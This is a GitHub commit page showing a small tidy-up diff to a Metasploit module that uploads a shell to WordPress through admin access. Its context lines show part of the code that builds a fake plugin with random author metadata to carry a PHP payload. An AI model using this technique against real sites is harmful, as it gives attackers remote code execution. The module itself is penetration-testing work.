Skip to content

Commit 76a64b3

Browse files
committed
Resolve msftidy issues
1 parent 7d30b21 commit 76a64b3

File tree

1 file changed

+2
-1
lines changed

1 file changed

+2
-1
lines changed

modules/exploits/unix/webapp/wp_admin_shell_upload.rb

Lines changed: 2 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -26,6 +26,7 @@ def initialize(info = {})
2626
[
2727
'Rob Carr <rob[at]rastating.com>' # Metasploit module
2828
],
29+
'DisclosureDate' => 'Feb 21 2015',
2930
'Platform' => 'php',
3031
'Arch' => ARCH_PHP,
3132
'Targets' => [['WordPress', {}]],
@@ -55,7 +56,7 @@ def generate_plugin(plugin_name, payload_name)
5556
r = Random.new
5657
plugin_script = %Q{<?php
5758
/**
58-
* Plugin Name: #{plugin_name}
59+
* Plugin Name: #{plugin_name}
5960
* Version: #{r.rand(1..20)}.#{r.rand(0..20)}.#{r.rand(0..20)}
6061
* Author: #{Rex::Text.rand_text_alpha(10)}
6162
* Author URI: http://#{Rex::Text.rand_text_alpha(10)}.com

0 commit comments

Comments
 (0)